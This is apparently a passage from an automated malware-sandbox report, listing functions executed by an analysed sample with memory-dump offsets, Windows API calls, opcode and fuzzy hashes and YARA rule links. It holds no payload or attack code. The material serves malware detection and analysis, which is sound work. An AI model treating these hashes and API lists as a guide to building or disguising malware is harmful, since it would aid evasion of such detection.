                                                                                              • Opcode Fuzzy Hash: 7c5efe0999876eb6bc1f90a99e31054607c1eda31d6c4e463b6577a7a4b972f8
                                                                                              • Instruction Fuzzy Hash: E9B2BF30B043458FCB16DB78C868699BBF5AF8A300F1585EAD449EB362EF349D85CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0169B748, Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517255186.0000000001690000.00000040.00000010.sdmp, Offset: 01690000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ce34c03cbeb3a07f389e3b686798eaa78b9b843be0e9ea945c96a12596d98192
                                                                                              • Instruction ID: 71dfea7f3c05b7b7f173c62156138d6573765aef86f1c52b0d69cc5a09830ada
                                                                                              • Opcode Fuzzy Hash: ce34c03cbeb3a07f389e3b686798eaa78b9b843be0e9ea945c96a12596d98192
                                                                                              • Instruction Fuzzy Hash: 43F16B30A00209CFDF14DFA9D944BADBBFABF98304F148569E405AF3A5DB74A945CB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 016BCB20, Relevance: 1.7, APIs: 1, Instructions: 208libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517332269.00000000016B0000.00000040.00000010.sdmp, Offset: 016B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 9ecb92d4b381641b5814431ad644070cd3d23f4b43c56ed1d9b269bcadb39d0d
                                                                                              • Instruction ID: e2194c0b203047bab5ab6adb4398336433b6372fced1e2f6841a1d4ea2af1f4a
                                                                                              • Opcode Fuzzy Hash: 9ecb92d4b381641b5814431ad644070cd3d23f4b43c56ed1d9b269bcadb39d0d
                                                                                              • Instruction Fuzzy Hash: F5718E35A00205CFDB14DFB8D898AEEBBB6AF84304F148928E506DB350DB749D81CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01826B7F, Relevance: 6.2, APIs: 4, Instructions: 150threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 01826C10
                                                                                              • GetCurrentThread.KERNEL32 ref: 01826C4D
                                                                                              • GetCurrentProcess.KERNEL32 ref: 01826C8A
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 01826CE3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: 8a9bfd691a55fe94fe171f60496690f35cef86d1d9ab49e6bc798c04b3448240
                                                                                              • Instruction ID: 63eee736a067bf464cd4c83587203df3eb9571f70dcba845c0b4f0c03e5af9e8
                                                                                              • Opcode Fuzzy Hash: 8a9bfd691a55fe94fe171f60496690f35cef86d1d9ab49e6bc798c04b3448240
                                                                                              • Instruction Fuzzy Hash: B151A8B0D012848FDB05DFA9CA487DEBFF0EF99314F24849AD449A7250D7349984CF62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01826BB0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 01826C10
                                                                                              • GetCurrentThread.KERNEL32 ref: 01826C4D
                                                                                              • GetCurrentProcess.KERNEL32 ref: 01826C8A
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 01826CE3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: eaf0707098bbb78a6cc3d155dea32480ec3805c23e02342d1e43ddf9578b2035
                                                                                              • Instruction ID: c8dfe54d6e1d427b02c976dd5ee0a706d6e87806239c62b2219fff6aaa2ec82f
                                                                                              • Opcode Fuzzy Hash: eaf0707098bbb78a6cc3d155dea32480ec3805c23e02342d1e43ddf9578b2035
                                                                                              • Instruction Fuzzy Hash: 765154B0D006488FDB14DFAADA48BDEBBF5EF98314F208459E909A7350D7749984CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 06469058, Relevance: 2.2, APIs: 1, Instructions: 655COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.520568232.0000000006460000.00000040.00000010.sdmp, Offset: 06460000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e63fda95a236f0b912765e9d03e547b8230149cf5a1e6c3ee13bd7378a244268
                                                                                              • Instruction ID: 12ccb38eb77345538d683a49faec5d183ac16c2a3d273ed78bd53bd3bd190a34
                                                                                              • Opcode Fuzzy Hash: e63fda95a236f0b912765e9d03e547b8230149cf5a1e6c3ee13bd7378a244268
                                                                                              • Instruction Fuzzy Hash: DC32CF30B003058FDB45EBB5C8586AEBBF6AF85304F14896AE40ADB391EB75DC45CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0646E100, Relevance: 1.7, APIs: 1, Instructions: 164COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.520568232.0000000006460000.00000040.00000010.sdmp, Offset: 06460000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f1b85f84e632bb6489ca15de3f0fdf0e987cab05633b624f167eb9f52be355cc
                                                                                              • Instruction ID: 4180eed3580aa1fcf278776796a08662e8e98a066d3fec9c06fafcb1550c1d14
                                                                                              • Opcode Fuzzy Hash: f1b85f84e632bb6489ca15de3f0fdf0e987cab05633b624f167eb9f52be355cc
                                                                                              • Instruction Fuzzy Hash: BD510472E043458FCB01DFBAD8446EEBBF5AF89310F1589ABE404A7251EB74D885CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 06469718, Relevance: 1.6, APIs: 1, Instructions: 138libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.520568232.0000000006460000.00000040.00000010.sdmp, Offset: 06460000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 857345fafc94729ef75b6518826d02b7eb47db80b2f81544174c4381a89e6dca
                                                                                              • Instruction ID: bfd39a51936ece3f18ca9083e1cc3f4f40142182876ca0d112178291c6d8dbd8
                                                                                              • Opcode Fuzzy Hash: 857345fafc94729ef75b6518826d02b7eb47db80b2f81544174c4381a89e6dca
                                                                                              • Instruction Fuzzy Hash: 82419271A10206DFCB14EFB4D888AEEB7F9BF94304F148969E4029B255DF70D9048BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 018251E7, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01825302
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 7618ecf06f31b4197606738782ef490d4eed21b5934609498759c7e1bbb5b4bd
                                                                                              • Instruction ID: e952c8c01d8b043ffacc9597e429a4bdb42542e29b5ad3ab3f7c26dfdf9e3b00
                                                                                              • Opcode Fuzzy Hash: 7618ecf06f31b4197606738782ef490d4eed21b5934609498759c7e1bbb5b4bd
                                                                                              • Instruction Fuzzy Hash: EB51B0B1D10319DFDB15CFA9C984ADEBBB5FF48314F24812AE819AB210D7B49985CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 018251F0, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01825302
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 1968298fa2e2c335ba90ccadccb613aa0d2f78b62a19163a0a805ba4ca1775c2
                                                                                              • Instruction ID: 181c2fbb6759b143a20dcfad24dda93fc0408c6bf3d21fbda6a2bcfe0d0e93c0
                                                                                              • Opcode Fuzzy Hash: 1968298fa2e2c335ba90ccadccb613aa0d2f78b62a19163a0a805ba4ca1775c2
                                                                                              • Instruction Fuzzy Hash: 7641C0B1D103199FDF15CF99C984ADEFBB5BF48314F24812AE819AB210D7B49985CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 018269C4, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 01827D59
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CallProcWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2714655100-0
                                                                                              • Opcode ID: 47a78264fd20d608371cb55f3cc65824d75d2ebb8d562884f87c59745780c4c7
                                                                                              • Instruction ID: 6a9824866fb364a5153f9a7ad2a9e98d6f4c74c4f453885dc018e349e8f45445
                                                                                              • Opcode Fuzzy Hash: 47a78264fd20d608371cb55f3cc65824d75d2ebb8d562884f87c59745780c4c7
                                                                                              • Instruction Fuzzy Hash: 6B417BB5900319CFDB05CF99C488AAABBF5FF98314F14C459E518AB325D375A981CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01697BF9, Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,00000000,?,01697BD9,00000800), ref: 01697C6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517255186.0000000001690000.00000040.00000010.sdmp, Offset: 01690000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: b21aed50cc94a8622a60ef413d052e18fa49921d616564bd766dbc042839b53f
                                                                                              • Instruction ID: 88e5555c7212d47bf2cc8159485ba24409c6565ee5424ef95f9189183881170e
                                                                                              • Opcode Fuzzy Hash: b21aed50cc94a8622a60ef413d052e18fa49921d616564bd766dbc042839b53f
                                                                                              • Instruction Fuzzy Hash: 022148B6C042488FCB10CFA9C8446EEFBF4AF98314F14846ED519B7201C375A545CF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01826DD3, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01826E5F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: fe642e044bd71cafdfffb88ba3d8e07a1c17fb324b8445e3534b018bf82299aa
                                                                                              • Instruction ID: 98c958dbfb7ff8d3ac25159496afb5a635596f86ce1b611614f741716a4bab48
                                                                                              • Opcode Fuzzy Hash: fe642e044bd71cafdfffb88ba3d8e07a1c17fb324b8445e3534b018bf82299aa
                                                                                              • Instruction Fuzzy Hash: EA21E4B5D00208AFDB10CFA9D984AEEBBF4FF48324F14841AE914A7310D378A954CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01826DD8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01826E5F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 8249fdba06adf8409ffa5096ce6d8ce70e8be165969e9fbac04c7330ab62ca7c
                                                                                              • Instruction ID: 7d7d451c84b9f894ce983490b4103982d75d0784834bf3556d2d1eebd643f997
                                                                                              • Opcode Fuzzy Hash: 8249fdba06adf8409ffa5096ce6d8ce70e8be165969e9fbac04c7330ab62ca7c
                                                                                              • Instruction Fuzzy Hash: 0B21B3B5900218AFDB11CFA9D984ADEBBF8EF48324F14841AE914A7210D378A954CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0646E238, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0646E1FA), ref: 0646E2E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.520568232.0000000006460000.00000040.00000010.sdmp, Offset: 06460000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: GlobalMemoryStatus
                                                                                              • String ID:
                                                                                              • API String ID: 1890195054-0
                                                                                              • Opcode ID: 978c914e568333b49c29f4690f2c7bf1048a9edd8a69a6fb8f36452108f92981
                                                                                              • Instruction ID: 5afccb6e96b6679c797bf733cb91bb5cc323a90395f17e5bd65d6f026dbe8a0f
                                                                                              • Opcode Fuzzy Hash: 978c914e568333b49c29f4690f2c7bf1048a9edd8a69a6fb8f36452108f92981
                                                                                              • Instruction Fuzzy Hash: DA1122B1D0825A8FCB11DFE9D4053DEBBF4AF05324F1509AAD440E7282D7388844CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0182BE49, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 0182BED2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: EncodePointer
                                                                                              • String ID:
                                                                                              • API String ID: 2118026453-0
                                                                                              • Opcode ID: 39952dcb97a66c1a29cd7d5df5a588c13117d97ba8f92c774435991ccf1b591b
                                                                                              • Instruction ID: f9ccfc261020cda9a1d6a7985b6707bb59073adbffedb7a07a367011a9d85a1e
                                                                                              • Opcode Fuzzy Hash: 39952dcb97a66c1a29cd7d5df5a588c13117d97ba8f92c774435991ccf1b591b
                                                                                              • Instruction Fuzzy Hash: 0E21ACB59013198FEB50DFA8E6883AEBBF8EB49324F14C529D404E3201D778A584CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0646CC10, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0646E1FA), ref: 0646E2E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.520568232.0000000006460000.00000040.00000010.sdmp, Offset: 06460000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: GlobalMemoryStatus
                                                                                              • String ID:
                                                                                              • API String ID: 1890195054-0
                                                                                              • Opcode ID: eb43f45a13b8ece663f3b7aedea85beedf7933c1ca146061b578b35b7e0cc207
                                                                                              • Instruction ID: 1131fd6ab0ff638b2a43dc949799d95a2687044a202aa6f4da43878e2ae4f413
                                                                                              • Opcode Fuzzy Hash: eb43f45a13b8ece663f3b7aedea85beedf7933c1ca146061b578b35b7e0cc207
                                                                                              • Instruction Fuzzy Hash: B91136B1C0461A9BDB10CF9AC5447EEFBF8AF48324F14856AE814B7200D378A954CFE5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01696D44, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,00000000,?,01697BD9,00000800), ref: 01697C6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517255186.0000000001690000.00000040.00000010.sdmp, Offset: 01690000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: 55ad2799c8f964c905355dd895b6e451e1cb2a802095e2b716137ee781c7c2c3
                                                                                              • Instruction ID: 0064641704cd08fa1a5b5f453d06069268e56f2725cecb79afe983ce6e6a1f12
                                                                                              • Opcode Fuzzy Hash: 55ad2799c8f964c905355dd895b6e451e1cb2a802095e2b716137ee781c7c2c3
                                                                                              • Instruction Fuzzy Hash: EC1106B59002499FDB10CF9AC944ADEFBF8EB98314F14842AE915B7300C375A545CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0182BE58, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 0182BED2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: EncodePointer
                                                                                              • String ID:
                                                                                              • API String ID: 2118026453-0
                                                                                              • Opcode ID: bd49b0a996a20b72c164a3d4d0a8e6fc7a51a43ddf2b7465da5f985488803f75
                                                                                              • Instruction ID: c4e5bed0920299924fe36eadaf7cedaec3b709a530b331f8911142bc4efecf5d
                                                                                              • Opcode Fuzzy Hash: bd49b0a996a20b72c164a3d4d0a8e6fc7a51a43ddf2b7465da5f985488803f75
                                                                                              • Instruction Fuzzy Hash: DB11A9B89013198FDB50DFA8E6487AEBBF8FB48324F14C529D514E3200D778A684CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0646E27A, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0646E1FA), ref: 0646E2E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.520568232.0000000006460000.00000040.00000010.sdmp, Offset: 06460000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: GlobalMemoryStatus
                                                                                              • String ID:
                                                                                              • API String ID: 1890195054-0
                                                                                              • Opcode ID: 7da74ad375987417bcf31f99bda7220bc54fa8eae847b6918eaac233007959a3
                                                                                              • Instruction ID: 310fad1ce8f14c69caceedd7a3daa1147978a29902deac27ba510edae289457a
                                                                                              • Opcode Fuzzy Hash: 7da74ad375987417bcf31f99bda7220bc54fa8eae847b6918eaac233007959a3
                                                                                              • Instruction Fuzzy Hash: 831103B1C0061A9FDB10CF9AD544BEEFBF4AF48324F14856AE818B7640D378A944CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01822F8C, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 01824276
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: e8c6bd0d48dfdecec2d47e7453a99e66421d42bd45be655626c4a61e89ee0e53
                                                                                              • Instruction ID: aee9a0e95ff9dace275b157bf9bda74479de9f8ed3ed89dd58bce975b7432f2b
                                                                                              • Opcode Fuzzy Hash: e8c6bd0d48dfdecec2d47e7453a99e66421d42bd45be655626c4a61e89ee0e53
                                                                                              • Instruction Fuzzy Hash: AE1123B1C006488BDB10CF9AC444BDEFBF4EB89324F14852AD529B7600D374A545CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0169B528, Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 0169B585
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517255186.0000000001690000.00000040.00000010.sdmp, Offset: 01690000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: 03460177b3947f6293597164654fe6084377cc33a30c3f60cd23f0f5e60cfa31
                                                                                              • Instruction ID: c4d19ca6b33f19167c2a7f4bdf41d0bc5959aa1efa055db88bffa6c7fef64419
                                                                                              • Opcode Fuzzy Hash: 03460177b3947f6293597164654fe6084377cc33a30c3f60cd23f0f5e60cfa31
                                                                                              • Instruction Fuzzy Hash: 631103B59006488FDB10CF99E985BDEBBF8AF48324F14845AE518B7700D379A984CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0182420F, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 01824276
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: 4d860ec1bd22f24e4a8ec5bdf06b24666e660e14e3239a2105078fafa5f33417
                                                                                              • Instruction ID: 07262430547d52934543cde00f8290b7c9c5d7db9433bd9bd578422bc34b19f4
                                                                                              • Opcode Fuzzy Hash: 4d860ec1bd22f24e4a8ec5bdf06b24666e660e14e3239a2105078fafa5f33417
                                                                                              • Instruction Fuzzy Hash: 2B11F0B5C006498FDB10CF9AC444ADEFBF4EF89324F14851AD529B7600D378A545CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0169A5E0, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 0169B585
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517255186.0000000001690000.00000040.00000010.sdmp, Offset: 01690000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: a8fbf3595937c6143831f957cb33092b6517a55f3a4a7b9b8cba57d60828a4e1
                                                                                              • Instruction ID: 2442fba805760c9ddd4c2d7033f3679d9ede56eddf2895998416a5dcf0f1acc2
                                                                                              • Opcode Fuzzy Hash: a8fbf3595937c6143831f957cb33092b6517a55f3a4a7b9b8cba57d60828a4e1
                                                                                              • Instruction Fuzzy Hash: 4D1130B08007088FDB10CF99E948BDEBBF8EB48324F148859E518B7300D378A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions